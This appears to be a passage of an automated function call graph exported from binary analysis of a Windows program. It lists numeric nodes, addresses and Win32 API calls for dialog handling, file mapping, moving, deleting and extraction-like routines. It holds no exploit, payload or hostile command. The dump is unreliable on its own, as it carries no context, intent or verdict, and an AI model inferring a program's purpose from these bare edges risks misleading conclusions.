23562->23564 23581 47b136 23562->23581 23564->23550 23565 47981b 23588 478dcc 23565->23588 23568 479830 23568->23565 23570 479837 23568->23570 23569 479821 23571 47985c SetLastError 23569->23571 23595 479649 20 API calls _unexpected 23570->23595 23596 478d24 38 API calls _abort 23571->23596 23574 479842 23575 478dcc _free 20 API calls 23574->23575 23577 479849 23575->23577 23577->23564 23577->23571 23578->23552 23579->23549 23580->23562 23586 47b143 _unexpected 23581->23586 23582 47b183 23598 4791a8 20 API calls _free 23582->23598 23583 47b16e RtlAllocateHeap 23584 479813 23583->23584 23583->23586 23584->23565 23594 47aeb1 11 API calls 2 library calls 23584->23594 23586->23582 23586->23583 23597 477a5e 7 API calls 2 library calls 23586->23597 23589 478dd7 RtlFreeHeap 23588->23589 23590 478e00 _free 23588->23590 23589->23590 23591 478dec 23589->23591 23590->23569 23599 4791a8 20 API calls _free 23591->23599 23593 478df2 GetLastError 23593->23590 23594->23568 23595->23574 23597->23586 23598->23584 23599->23593 25453 46b5c0 100 API calls 25454 4677c0 118 API calls 25455 46ffc0 RaiseException _com_raise_error _com_error::_com_error 25410 4662ca 123 API calls __InternalCxxFrameHandler 23661 4510d5 23666 455abd 23661->23666 23667 455ac7 __EH_prolog 23666->23667 23673 45b505 23667->23673 23669 455ad3 23679 455cac GetCurrentProcess GetProcessAffinityMask 23669->23679 23674 45b50f __EH_prolog 23673->23674 23680 45f1d0 82 API calls 23674->23680 23676 45b521 23681 45b61e 23676->23681 23680->23676 23682 45b630 __cftof 23681->23682 23685 4610dc 23682->23685 23688 46109e GetCurrentProcess GetProcessAffinityMask 23685->23688 23689 45b597 23688->23689 23689->23669 23690 46e2d7 23692 46e1db 23690->23692 23691 46e85d ___delayLoadHelper2@8 14 API calls 23691->23692 23692->23691 25412 46f4d3 20 API calls 23695 46e1d1 14 API calls ___delayLoadHelper2@8 25458 47a3d0 21 API calls 2 library calls 25459 482bd0 VariantClear 25414 470ada 51 API calls 2 library calls 23802 46eae7 23803 46eaf1 23802->23803 23804 46e85d ___delayLoadHelper2@8 14 API calls 23803->23804 23805 46eafe 23804->23805 25415 46f4e7 29 API calls _abort 23807 4513e1 84 API calls 2 library calls 23808 46b7e0 23809 46b7ea __EH_prolog 23808->23809 23974 451316 23809->23974 23812 46bf0f 24046 46d69e 23812->24046 23813 46b82a 23816 46b89b 23813->23816 23817 46b838 23813->23817 23891 46b841 23813->23891 23820 46b92e GetDlgItemTextW 23816->23820 23826 46b8b1 23816->23826 23821 46b83c 23817->23821 23822 46b878 23817->23822 23818 46bf2a SendMessageW 23819 46bf38 23818->23819 23823 46bf52 GetDlgItem SendMessageW 23819->23823 23824 46bf41 SendDlgItemMessageW 23819->23824 23820->23822 23825 46b96b 23820->23825 23827 45e617 53 API calls 23821->23827 23821->23891 23829 46b95f KiUserCallbackDispatcher 23822->23829 23822->23891 24064 46a64d GetCurrentDirectoryW 23823->24064 23824->23823 23830 46b980 GetDlgItem 23825->23830 23972 46b974 23825->23972 23831 45e617 53 API calls 23826->23831 23832 46b85b 23827->23832 23829->23891 23834 46b9b7 SetFocus 23830->23834 23835 46b994 SendMessageW SendMessageW 23830->23835 23836 46b8ce SetDlgItemTextW 23831->23836 24084 45124f SHGetMalloc 23832->24084 23833 46bf82 GetDlgItem 23838 46bfa5 SetWindowTextW 23833->23838 23839 46bf9f 23833->23839 23840 46b9c7 23834->23840 23851 46b9e0 23834->23851 23835->23834 23841 46b8d9 23836->23841 24065 46abab GetClassNameW 23838->24065 23839->23838 23844 45e617 53 API calls 23840->23844 23847 46b8e6 GetMessageW 23841->23847 23841->23891 23842 46be55 23845 45e617 53 API calls 23842->23845 23848 46b9d1 23844->23848 23852 46be65 SetDlgItemTextW 23845->23852 23854 46b8fd IsDialogMessageW 23847->23854 23847->23891 24085 46d4d4 23848->24085 23850 46c1fc SetDlgItemTextW 23850->23891 23858 45e617 53 API calls 23851->23858 23856 46be79 23852->23856 23854->23841 23855 46b90c TranslateMessage DispatchMessageW 23854->23855 23855->23841 23860 45e617 53 API calls 23856->23860 23859 46ba17 23858->23859 23865 454092 _swprintf 51 API calls 23859->23865 23894 46be9c _wcslen 23860->23894 23861 46bff0 23864 46c020 23861->23864 23868 45e617 53 API calls 23861->23868 23863 46c73f 97 API calls 23863->23861 23873 46c73f 97 API calls 23864->23873 23913 46c0d8 23864->23913 23869 46ba29 23865->23869 23866 46b9d9 23984 45a0b1 23866->23984 23872 46c003 SetDlgItemTextW 23868->23872 23874 46d4d4 16 API calls 23869->23874 23870 46ba73 23990 46ac04 SetCurrentDirectoryW 23870->23990 23871 46ba68 GetLastError 23871->23870 23879 45e617 53 API calls 23872->23879 23881 46c03b 23873->23881 23874->23866 23875 46c18b 23876 46c194 EnableWindow 23875->23876 23877 46c19d 23875->23877 23876->23877 23882 46c1ba 23877->23882 24103 4512d3 GetDlgItem EnableWindow 23877->24103 23878 46beed 23885 45e617 53 API calls 23878->23885 23883 46c017 SetDlgItemTextW 23879->23883 23892 46c04d 23881->23892 23918 46c072 23881->23918 23888 46c1e1 23882->23888 23902 46c1d9 SendMessageW 23882->23902 23883->23864 23884 46ba87 23889 46ba90 GetLastError 23884->23889 23890 46ba9e 23884->23890 23885->23891 23886 46c0cb 23895 46c73f 97 API calls 23886->23895 23888->23891 23904 45e617 53 API calls 23888->23904 23889->23890 23899 46bb20 23890->23899 23903 46baae GetTickCount 23890->23903 23949 46bb11 23890->23949 24101 469ed5 32 API calls 23892->24101 23893 46c1b0 24104 4512d3 GetDlgItem EnableWindow 23893->24104 23894->23878 23897 45e617 53 API calls 23894->23897 23895->23913 23905 46bed0 23897->23905 23898 46bd56 24006 4512f1 GetDlgItem ShowWindow 23898->24006 23906 46bcfb 23899->23906 23907 46bcf1 23899->23907 23908 46bb39 GetModuleFileNameW 23899->23908 23900 46c066 23900->23918 23902->23888 23911 454092 _swprintf 51 API calls 23903->23911 23912 46b862 23904->23912 23914 454092 _swprintf 51 API calls 23905->23914 23917 45e617 53 API calls 23906->23917 23907->23822 23907->23906 24095 45f28c 82 API calls 23908->24095 23909 46c169 24102 469ed5 32 API calls 23909->24102 23920 46bac7 23911->23920 23912->23850 23912->23891 23913->23875 23913->23909 23921 45e617 53 API calls 23913->23921 23914->23878 23924 46bd05 23917->23924 23918->23886 23925 46c73f 97 API calls 23918->23925 23919 46bd66 24007 4512f1 GetDlgItem ShowWindow 23919->24007 23991 45966e 23920->23991 23921->23913 23922 46bb5f 23927 454092 _swprintf 51 API calls 23922->23927 23923 46c188 23923->23875 23928 454092 _swprintf 51 API calls 23924->23928 23929 46c0a0 23925->23929 23933 46bb81 CreateFileMappingW 23927->23933 23934 46bd23 23928->23934 23929->23886 23935 46c0a9 DialogBoxParamW 23929->23935 23930 46bd70 23931 45e617 53 API calls 23930->23931 23936 46bd7a SetDlgItemTextW 23931->23936 23938 46bbe3 GetCommandLineW 23933->23938 23965 46bc60 __InternalCxxFrameHandler 23933->23965 23946 45e617 53 API calls 23934->23946 23935->23822 23935->23886 24008 4512f1 GetDlgItem ShowWindow 23936->24008 23937 46baed 23940 46baf4 GetLastError 23937->23940 23941 46baff 23937->23941 23942 46bbf4 23938->23942 23940->23941 23999 45959a 23941->23999 24096 46b425 SHGetMalloc 23942->24096 23943 46bd8c SetDlgItemTextW GetDlgItem 23947 46bdc1 23943->23947 23948 46bda9 GetWindowLongW SetWindowLongW 23943->23948 23951 46bd3d 23946->23951 24009 46c73f 23947->24009 23948->23947 23949->23898 23949->23899 23950 46bc10 24097 46b425 SHGetMalloc 23950->24097 23955 46bc1c 24098 46b425 SHGetMalloc 23955->24098 23956 46c73f 97 API calls 23958 46bddd 23956->23958 24034 46da52 23958->24034 23959 46bc28 24099 45f3fa 82 API calls 2 library calls 23959->24099 23960 46bccb 23960->23907 23967 46bce1 UnmapViewOfFile CloseHandle 23960->23967 23964 46bc3f MapViewOfFile 23964->23965 23965->23960 23968 46bcb7 Sleep 23965->23968 23966 46c73f 97 API calls 23971 46be03 23966->23971 23967->23907 23968->23960 23968->23965 23969 46be2c 24100 4512d3 GetDlgItem EnableWindow 23969->24100 23971->23969 23973 46c73f 97 API calls 23971->23973 23972->23822 23972->23842 23973->23969 23975 45131f 23974->23975 23976 451378 23974->23976 23978 451385 23975->23978 24105 45e2e8 62 API calls 2 library calls 23975->24105 24106 45e2c1 GetWindowLongW SetWindowLongW 23976->24106 23978->23812 23978->23813 23978->23891 23980 451341 23980->23978 23981 451354 GetDlgItem 23980->23981 23981->23978 23982 451364 23981->23982 23982->23978 23983 45136a SetWindowTextW 23982->23983 23983->23978 23986 45a0bb 23984->23986 23985 45a14c 23987 45a2b2 8 API calls 23985->23987 23989 45a175 23985->23989 23986->23985 23986->23989 24107 45a2b2 23986->24107 23987->23989 23989->23870 23989->23871 23990->23884 23992 459678 23991->23992 23993 4596d5 CreateFileW 23992->23993 23994 4596c9 23992->23994 23993->23994 23995 45bb03 GetCurrentDirectoryW 23994->23995 23997 45971f 23994->23997 23996 459704 23995->23996 23996->23997 23998 459708 CreateFileW 23996->23998 23997->23937 23998->23997 24000 4595be 23999->24000 24005 4595cf 23999->24005 24001 4595d1 24000->24001 24002 4595ca 24000->24002 24000->24005 24133 459620 24001->24133 24128 45974e 24002->24128 24005->23949 24006->23919 24007->23930 24008->23943 24010 46c749 __EH_prolog 24009->24010 24011 46bdcf 24010->24011 24012 46b314 ExpandEnvironmentStringsW 24010->24012 24011->23956 24019 46c780 _wcslen _wcsrchr 24012->24019 24014 46b314 ExpandEnvironmentStringsW 24014->24019 24015 46ca67 SetWindowTextW 24015->24019 24018 473e3e 22 API calls 24018->24019 24019->24011 24019->24014 24019->24015 24019->24018 24021 46c855 SetFileAttributesW 24019->24021 24026 46cc31 GetDlgItem SetWindowTextW SendMessageW 24019->24026 24029 46cc71 SendMessageW 24019->24029 24148 461fbb CompareStringW 24019->24148 24149 46a64d GetCurrentDirectoryW 24019->24149 24151 45a5d1 6 API calls 24019->24151 24152 45a55a FindClose 24019->24152 24153 46b48e 76 API calls 2 library calls 24019->24153 24022 46c90f GetFileAttributesW 24021->24022 24033 46c86f __cftof _wcslen 24021->24033 24022->24019 24025 46c921 DeleteFileW 24022->24025 24025->24019 24027 46c932 24025->24027 24026->24019 24028 454092 _swprintf 51 API calls 24027->24028 24030 46c952 GetFileAttributesW 24028->24030 24029->24019 24030->24027 24031 46c967 MoveFileW 24030->24031 24031->24019 24032 46c97f MoveFileExW 24031->24032 24032->24019 24033->24019 24033->24022 24150 45b991 51 API calls 3 library calls 24033->24150 24035 46da5c __EH_prolog 24034->24035 24154 460659 24035->24154 24037 46da8d 24158 455b3d 24037->24158 24039 46daab 24162 457b0d 24039->24162 24043 46dafe 24178 457b9e 24043->24178 24045 46bdee 24045->23966 24047 46d6a8 24046->24047 24656 46a5c6 24047->24656 24050 46bf15 24050->23818 24050->23819 24051 46d6b5 GetWindow 24051->24050 24054 46d6d5 24051->24054 24052 46d6e2 GetClassNameW 24661 461fbb CompareStringW 24052->24661 24054->24050 24054->24052 24055 46d706 GetWindowLongW 24054->24055 24056 46d76a GetWindow 24054->24056 24055->24056 24057 46d716 SendMessageW 24055->24057 24056->24050 24056->24054 24057->24056 24058 46d72c GetObjectW 24057->24058 24662 46a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24058->24662 24060 46d743 24663 46a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24060->24663 24664 46a80c 8 API calls 24060->24664 24063 46d754 SendMessageW DeleteObject 24063->24056 24064->23833 24066 46abf1 24065->24066 24067 46abcc 24065->24067 24071 46b093 24066->24071 24667 461fbb CompareStringW 24067->24667 24069 46abdf 24069->24066 24070 46abe3 FindWindowExW 24069->24070 24070->24066 24072 46b09d __EH_prolog 24071->24072 24073 4513dc 84 API calls 24072->24073 24074 46b0bf 24073->24074 24668 451fdc 24074->24668 24077 46b0eb 24080 4519af 128 API calls 24077->24080 24078 46b0d9 24079 451692 86 API calls 24078->24079 24081 46b0e4 24079->24081 24083 46b10d __InternalCxxFrameHandler ___std_exception_copy 24080->24083 24081->23861 24081->23863 24082 451692 86 API calls 24082->24081 24083->24082 24084->23912 24086 46b568 5 API calls 24085->24086 24087 46d4e0 GetDlgItem 24086->24087 24088 46d536 SendMessageW SendMessageW 24087->24088 24089 46d502 24087->24089 24090 46d572 24088->24090 24091 46d591 SendMessageW SendMessageW SendMessageW 24088->24091 24092 46d50d ShowWindow SendMessageW SendMessageW 24089->24092 24090->24091 24093 46d5e7 SendMessageW 24091->24093 24094 46d5c4 SendMessageW 24091->24094 24092->24088 24093->23866 24094->24093 24095->23922 24096->23950 24097->23955 24098->23959 24099->23964 24100->23972 24101->23900 24102->23923 24103->23893 24104->23882 24105->23980 24106->23978 24108 45a2bf 24107->24108 24109 45a2e3 24108->24109 24110 45a2d6 CreateDirectoryW 24108->24110 24111 45a231 3 API calls 24109->24111 24110->24109 24112 45a316 24110->24112 24113 45a2e9 24111->24113 24115 45a325 24112->24115 24120 45a4ed 24112->24120 24114 45a329 GetLastError 24113->24114 24116 45bb03 GetCurrentDirectoryW 24113->24116 24114->24115 24115->23986 24118 45a2ff 24116->24118 24118->24114 24119 45a303 CreateDirectoryW 24118->24119 24119->24112 24119->24114 24121 46ec50 24120->24121 24122 45a4fa SetFileAttributesW 24121->24122 24123 45a510 24122->24123 24124 45a53d 24122->24124 24125 45bb03 GetCurrentDirectoryW 24123->24125 24124->24115 24126 45a524 24125->24126 24126->24124 24127 45a528 SetFileAttributesW 24126->24127 24127->24124 24129 459781 24128->24129 24132 459757 24128->24132 24129->24005 24132->24129 24139 45a1e0 24132->24139 24134 45962c 24133->24134 24135 45964a 24133->24135 24134->24135 24137 459638 CloseHandle 24134->24137 24136 459669 24135->24136 24147 456bd5 76 API calls 24135->24147 24136->24005 24137->24135 24140 46ec50 24139->24140 24141 45a1ed DeleteFileW 24140->24141 24142 45a200 24141->24142 24143 45977f 24141->24143 24144 45bb03 GetCurrentDirectoryW 24142->24144 24143->24005 24145 45a214 24144->24145 24145->24143 24146 45a218 DeleteFileW 24145->24146 24146->24143 24147->24136 24148->24019 24149->24019 24150->24033 24151->24019 24152->24019 24153->24019 24155 460666 _wcslen 24154->24155 24182 4517e9 24155->24182 24157 46067e 24157->24037 24159 460659 _wcslen 24158->24159 24160 4517e9 78 API calls 24159->24160 24161 46067e 24160->24161 24161->24039 24163 457b17 __EH_prolog 24162->24163 24199 45ce40 24163->24199 24165 457b32 24205 46eb38 24165->24205 24168 457b5c 24214 464a76 24168->24214 24170 457c7d 24171 457c87 24170->24171 24173 457cf1 24171->24173 24246 45a56d 24171->24246 24174 457d50 24173->24174 24224 458284 24173->24224 24177 457d92 24174->24177 24252 45138b 74 API calls 24174->24252 24177->24043 24179 457bac 24178->24179 24181 457bb3 24178->24181 24180 462297 86 API calls 24179->24180 24180->24181 24183 4517ff 24182->24183 24194 45185a __InternalCxxFrameHandler 24182->24194 24184 451828 24183->24184 24195 456c36 76 API calls __vswprintf_c_l 24183->24195 24186 451887 24184->24186 24189 451847 ___std_exception_copy 24184->24189 24188 473e3e 22 API calls 24186->24188 24187 45181e 24196 456ca7 75 API calls 24187->24196 24191 45188e 24188->24191 24189->24194 24197 456ca7 75 API calls 24189->24197 24191->24194 24198 456ca7 75 API calls 24191->24198 24194->24157 24195->24187 24196->24184 24197->24194 24198->24194 24200 45ce4a __EH_prolog 24199->24200 24201 46eb38 8 API calls 24200->24201 24202 45ce8d 24201->24202 24203 46eb38 8 API calls 24202->24203 24204 45ceb1 24203->24204 24204->24165 24207 46eb3d ___std_exception_copy 24205->24207 24206 46eb57 24206->24168 24207->24206 24210 46eb59 24207->24210 24220 477a5e 7 API calls 2 library calls 24207->24220 24209 46f5c9 24222 47238d RaiseException 24209->24222 24210->24209 24221 47238d RaiseException 24210->24221 24213 46f5e6 24215 464a80 __EH_prolog 24214->24215 24216 46eb38 8 API calls 24215->24216 24217 464a9c 24216->24217 24218 457b8b 24217->24218 24223 460e46 80 API calls 24217->24223 24218->24170 24220->24207 24221->24209 24222->24213 24223->24218 24225 45828e __EH_prolog 24224->24225 24253 4513dc 24225->24253 24227 4582aa 24228 4582bb 24227->24228 24393 459f42 24227->24393 24231 4582f2 24228->24231 24261 451a04 24228->24261 24389 451692 24231->24389 24234 458389 24280 458430 24234->24280 24238 4583e8 24285 451f6d 24238->24285 24241 4582ee 24241->24231 24241->24234 24244 45a56d 7 API calls 24241->24244 24397 45c0c5 CompareStringW _wcslen 24241->24397 24242 4583f3 24242->24231 24289 453b2d 24242->24289 24301 45848e 24242->24301 24244->24241 24247 45a582 24246->24247 24248 45a5b0 24247->24248 24645 45a69b 24247->24645 24248->24171 24250 45a592 24250->24248 24251 45a597 FindClose 24250->24251 24251->24248 24252->24177 24254 4513e1 __EH_prolog 24253->24254 24255 45ce40 8 API calls 24254->24255 24256 451419 24255->24256 24257 46eb38 8 API calls 24256->24257 24260 451474 __cftof 24256->24260 24258 451461 24257->24258 24259 45b505 84 API calls 24258->24259 24258->24260 24259->24260 24260->24227 24262 451a0e __EH_prolog 24261->24262 24274 451a61 24262->24274 24277 451b9b 24262->24277 24399 4513ba 24262->24399 24264 451bc7 24411 45138b 74 API calls 24264->24411 24267 453b2d 101 API calls 24271 451c12 24267->24271 24268 451bd4 24268->24267 24268->24277 24269 451c5a 24273 451c8d 24269->24273 24269->24277 24412 45138b 74 API calls 24269->24412 24271->24269 24272 453b2d 101 API calls 24271->24272 24272->24271 24273->24277 24278 459e80 79 API calls 24273->24278 24274->24264 24274->24268 24274->24277 24275 453b2d 101 API calls 24276 451cde 24275->24276 24276->24275 24276->24277 24277->24241 24278->24276 24432 45cf3d 24280->24432 24282 458440 24436 4613d2 GetSystemTime SystemTimeToFileTime 24282->24436 24284 4583a3 24284->24238 24398 461b66 72 API calls 24284->24398 24286 451f72 __EH_prolog 24285->24286 24288 451fa6 24286->24288 24441 4519af 24286->24441 24288->24242 24290 453b3d 24289->24290 24291 453b39 24289->24291 24300 459e80 79 API calls 24290->24300 24291->24242 24292 453b4f 24293 453b78 24292->24293 24294 453b6a 24292->24294 24572 45286b 101 API calls 3 library calls 24293->24572 24297 453baa 24294->24297 24571 4532f7 89 API calls 2 library calls 24294->24571 24297->24242 24298 453b76 24298->24297 24573 4520d7 74 API calls 24298->24573 24300->24292 24302 458498 __EH_prolog 24301->24302 24307 4584d5 24302->24307 24312 458513 24302->24312 24598 468c8d 103 API calls 24302->24598 24303 4584f5 24305 45851c 24303->24305 24306 4584fa 24303->24306 24305->24312 24600 468c8d 103 API calls 24305->24600 24306->24312 24599 457a0d 152 API calls 24306->24599 24307->24303 24311 45857a 24307->24311 24307->24312 24311->24312 24574 455d1a 24311->24574 24312->24242 24313 458605 24313->24312 24580 458167 24313->24580 24316 458797 24317 45a56d 7 API calls 24316->24317 24318 458802 24316->24318 24317->24318 24586 457c0d 24318->24586 24320 45d051 82 API calls 24326 45885d 24320->24326 24321 45898b 24603 452021 74 API calls 24321->24603 24322 458992 24323 458a5f 24322->24323 24330 4589e1 24322->24330 24327 458ab6 24323->24327 24342 458a6a 24323->24342 24326->24312 24326->24320 24326->24321 24326->24322 24601 458117 84 API calls 24326->24601 24602 452021 74 API calls 24326->24602 24334 458a4c 24327->24334 24606 457fc0 97 API calls 24327->24606 24328 458b14 24331 459105 24328->24331 24349 458b82 24328->24349 24607 4598bc 24328->24607 24329 458ab4 24335 45959a 80 API calls 24329->24335 24330->24328 24330->24334 24336 45a231 3 API calls 24330->24336 24333 45959a 80 API calls 24331->24333 24333->24312 24334->24328 24334->24329 24335->24312 24337 458a19 24336->24337 24337->24334 24604 4592a3 97 API calls 24337->24604 24339 45ab1a 8 API calls 24340 458bd1 24339->24340 24343 45ab1a 8 API calls 24340->24343 24342->24329 24605 457db2 101 API calls 24342->24605 24363 458be7 24343->24363 24347 458b70 24611 456e98 77 API calls 24347->24611 24349->24339 24350 458e40 24355 458e66 24350->24355 24356 458e52 24350->24356 24375 458d49 24350->24375 24351 458d18 24353 458d8a 24351->24353 24354 458d28 24351->24354 24352 458cbc 24352->24350 24352->24351 24360 458167 19 API calls 24353->24360 24357 458d6e 24354->24357 24364 458d37 24354->24364 24359 463377 75 API calls 24355->24359 24358 459215 123 API calls 24356->24358 24357->24375 24614 4577b8 111 API calls 24357->24614 24358->24375 24361 458e7f 24359->24361 24365 458dbd 24360->24365 24617 463020 123 API calls 24361->24617 24362 458c93 24362->24352 24612 459a3c 82 API calls 24362->24612 24363->24352 24363->24362 24369 45981a 79 API calls 24363->24369 24613 452021 74 API calls 24364->24613 24371 458df5 24365->24371 24372 458de6 24365->24372 24365->24375 24369->24362 24616 459155 93 API calls __EH_prolog 24371->24616 24615 457542 85 API calls 24372->24615 24378 458f85 24375->24378 24618 452021 74 API calls 24375->24618 24377 459090 24377->24331 24379 45a4ed 3 API calls 24377->24379 24378->24331 24378->24377 24380 45903e 24378->24380 24592 459f09 SetEndOfFile 24378->24592 24381 4590eb 24379->24381 24593 459da2 24380->24593 24381->24331 24619 452021 74 API calls 24381->24619 24384 459085 24386 459620 77 API calls 24384->24386 24386->24377 24387 4590fb 24620 456dcb 76 API calls _wcschr 24387->24620 24390 4516a4 24389->24390 24636 45cee1 24390->24636 24394 459f59 24393->24394 24395 459f63 24394->24395 24644 456d0c 78 API calls 24394->24644 24395->24228 24397->24241 24398->24238 24413 451732 24399->24413 24401 4513d6 24402 459e80 24401->24402 24403 459ea5 24402->24403 24404 459e92 24402->24404 24406 459eb8 SetFilePointer 24403->24406 24408 459eb0 24403->24408 24404->24408 24430 456d5b 77 API calls 24404->24430 24407 459ed4 GetLastError 24406->24407 24406->24408 24407->24408 24409 459ede 24407->24409 24408->24274 24409->24408 24431 456d5b 77 API calls 24409->24431 24411->24277 24412->24273 24414 451748 24413->24414 24425 4517a0 __InternalCxxFrameHandler 24413->24425 24415 451771 24414->24415 24426 456c36 76 API calls __vswprintf_c_l 24414->24426 24417 4517c7 24415->24417 24422 45178d ___std_exception_copy 24415->24422 24419 473e3e 22 API calls 24417->24419 24418 451767 24427 456ca7 75 API calls 24418->24427 24421 4517ce 24419->24421 24421->24425 24429 456ca7 75 API calls 24421->24429 24422->24425 24428 456ca7 75 API calls 24422->24428 24425->24401 24426->24418 24427->24415 24428->24425 24429->24425 24430->24403 24431->24408 24433 45cf4d 24432->24433 24435 45cf54 24432->24435 24437 45981a 24433->24437 24435->24282 24436->24284 24438 459833 24437->24438 24440 459e80 79 API calls 24438->24440 24439 459865 24439->24435 24440->24439 24442 4519bf 24441->24442 24444 4519bb 24441->24444 24445 4518f6 24442->24445 24444->24288 24446 451908 24445->24446 24447 451945 24445->24447 24448 453b2d 101 API calls 24446->24448 24453 453fa3 24447->24453 24450 451928 24448->24450 24450->24444 24456 453fac 24453->24456 24454 453b2d 101 API calls 24454->24456 24456->24454 24457 451966 24456->24457 24470 460e08 24456->24470 24457->24450 24458 451e50 24457->24458 24459 451e5a __EH_prolog 24458->24459 24478 453bba 24459->24478 24461 451e84 24462 451732 78 API calls 24461->24462 24465 451f0b 24461->24465 24463 451e9b 24462->24463 24506 4518a9 78 API calls 24463->24506 24465->24450 24466 451eb3 24467 451ebf _wcslen 24466->24467 24507 461b84 MultiByteToWideChar 24466->24507 24508 4518a9 78 API calls 24467->24508 24471 460e0f 24470->24471 24472 460e2a 24471->24472 24476 456c31 RaiseException _com_raise_error 24471->24476 24474 460e3b SetThreadExecutionState 24472->24474 24477 456c31 RaiseException _com_raise_error 24472->24477 24474->24456 24476->24472 24477->24474 24479 453bc4 __EH_prolog 24478->24479 24480 453bf6 24479->24480 24481 453bda 24479->24481 24483 453e51 24480->24483 24486 453c22 24480->24486 24534 45138b 74 API calls 24481->24534 24551 45138b 74 API calls 24483->24551 24485 453be5 24485->24461 24486->24485 24509 463377 24486->24509 24488 453ca3 24489 453d2e 24488->24489 24505 453c9a 24488->24505 24537 45d051 24488->24537 24519 45ab1a 24489->24519 24490 453c9f 24490->24488 24536 4520bd 78 API calls 24490->24536 24492 453c71 24492->24488 24492->24490 24493 453c8f 24492->24493 24535 45138b 74 API calls 24493->24535 24497 453d41 24499 453dd7 24497->24499 24500 453dc7 24497->24500 24543 463020 123 API calls 24499->24543 24523 459215 24500->24523 24503 453dd5 24503->24505 24544 452021 74 API calls 24503->24544 24545 462297 24505->24545 24506->24466 24507->24467 24508->24465 24510 46338c 24509->24510 24512 463396 ___std_exception_copy 24509->24512 24552 456ca7 75 API calls 24510->24552 24513 4634c6 24512->24513 24514 46341c 24512->24514 24518 463440 __cftof 24512->24518 24554 47238d RaiseException 24513->24554 24553 4632aa 75 API calls 3 library calls 24514->24553 24517 4634f2 24518->24492 24520 45ab28 24519->24520 24522 45ab32 24519->24522 24521 46eb38 8 API calls 24520->24521 24521->24522 24522->24497 24524 45921f __EH_prolog 24523->24524 24555 457c64 24524->24555 24527 4513ba 78 API calls 24528 459231 24527->24528 24558 45d114 24528->24558 24530 45928a 24530->24503 24531 459243 24531->24530 24533 45d114 118 API calls 24531->24533 24567 45d300 97 API calls __InternalCxxFrameHandler 24531->24567 24533->24531 24534->24485 24535->24505 24536->24488 24538 45d084 24537->24538 24539 45d072 24537->24539 24569 45603a 82 API calls 24538->24569 24568 45603a 82 API calls 24539->24568 24542 45d07c 24542->24489 24543->24503 24544->24505 24546 4622a1 24545->24546 24547 4622ba 24546->24547 24550 4622ce 24546->24550 24570 460eed 86 API calls 24547->24570 24549 4622c1 24549->24550 24551->24485 24552->24512 24553->24518 24554->24517 24556 45b146 GetVersionExW 24555->24556 24557 457c69 24556->24557 24557->24527 24564 45d12a __InternalCxxFrameHandler 24558->24564 24559 45d29a 24560 45d2ce 24559->24560 24561 45d0cb 6 API calls 24559->24561 24562 460e08 SetThreadExecutionState RaiseException 24560->24562 24561->24560 24565 45d291 24562->24565 24563 468c8d 103 API calls 24563->24564 24564->24559 24564->24563 24564->24565 24566 45ac05 91 API calls 24564->24566 24565->24531 24566->24564 24567->24531 24568->24542 24569->24542 24570->24549 24571->24298 24572->24298 24573->24297 24575 455d2a 24574->24575 24621 455c4b 24575->24621 24577 455d5d 24579 455d95 24577->24579 24626 45b1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 24577->24626 24579->24313 24581 458186 24580->24581 24582 458232 24581->24582 24633 45be5e 19 API calls __InternalCxxFrameHandler 24581->24633 24632 461fac CharUpperW 24582->24632 24585 45823b 24585->24316 24587 457c22 24586->24587 24588 457c5a 24587->24588 24634 456e7a 74 API calls 24587->24634 24588->24326 24590 457c52 24635 45138b 74 API calls 24590->24635 24592->24380 24594 459db3 24593->24594 24597 459dc2 24593->24597 24595 459db9 FlushFileBuffers 24594->24595 24594->24597 24595->24597 24596 459e3f SetFileTime 24596->24384 24597->24596 24598->24307 24599->24312 24600->24312 24601->24326 24602->24326 24603->24322 24604->24334 24605->24329 24606->24334 24608 4598c5 GetFileType 24607->24608 24609 458b5a 24607->24609 24608->24609 24609->24349 24610 452021 74 API calls 24609->24610 24610->24347 24611->24349 24612->24352 24613->24375 24614->24375 24615->24375 24616->24375 24617->24375 24618->24378 24619->24387 24620->24331 24627 455b48 24621->24627 24623 455c6c 24623->24577 24625 455b48 2 API calls 24625->24623 24626->24577 24630 455b52 24627->24630 24628 455c3a 24628->24623 24628->24625 24630->24628 24631 45b1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 24630->24631 24631->24630 24632->24585 24633->24582 24634->24590 24635->24588 24637 45cef2 24636->24637 24642 45a99e 86 API calls 24637->24642 24639 45cf24 24643 45a99e 86 API calls 24639->24643 24641 45cf2f 24642->24639 24643->24641 24644->24395 24646 45a6a8 24645->24646 24647 45a727 FindNextFileW 24646->24647 24648 45a6c1 FindFirstFileW 24646->24648 24650 45a732 GetLastError 24647->24650 24655 45a709 24647->24655 24649 45a6d0 24648->24649 24648->24655 24651 45bb03 GetCurrentDirectoryW 24649->24651 24650->24655 24652 45a6e0 24651->24652 24653 45a6e4 FindFirstFileW 24652->24653 24654 45a6fe GetLastError 24652->24654 24653->24654 24653->24655 24654->24655 24655->24250 24665 46a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24656->24665 24658 46a5cd 24659 46a5d9 24658->24659 24666 46a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24658->24666 24659->24050 24659->24051 24661->24054 24662->24060 24663->24060 24664->24063 24665->24658 24666->24659 24667->24069 24669 459f42 78 API calls 24668->24669 24670 451fe8 24669->24670 24671 451a04 101 API calls 24670->24671 24674 452005 24670->24674 24672 451ff5 24671->24672 24672->24674 24675 45138b 74 API calls 24672->24675 24674->24077 24674->24078 24675->24674 25416 4694e0 GetClientRect 25417 46f2e0 46 API calls __RTC_Initialize 25461 4621e0 26 API calls std::bad_exception::bad_exception 25418 47bee0 GetCommandLineA GetCommandLineW 25463 45f1e8 FreeLibrary 25420 455ef0 82 API calls 25464 4595f0 80 API calls 24691 4798f0 24699 47adaf 24691->24699 24694 479904 24696 47990c 24697 479919 24696->24697 24707 479920 11 API calls 24696->24707 24708 47ac98 24699->24708 24702 47adee TlsAlloc 24703 47addf 24702->24703 24704 46fbbc CatchGuardHandler 5 API calls 24703->24704 24705 4798fa 24704->24705 24705->24694 24706 479869 20 API calls 2 library calls 24705->24706 24706->24696 24707->24694 24709 47acc4 24708->24709 24710 47acc8 24708->24710 24709->24710 24711 47ace8 24709->24711 24715 47ad34 24709->24715 24710->24702 24710->24703 24711->24710 24713 47acf4 GetProcAddress 24711->24713 24714 47ad04 _unexpected 24713->24714 24714->24710 24716 47ad55 LoadLibraryExW 24715->24716 24721 47ad4a 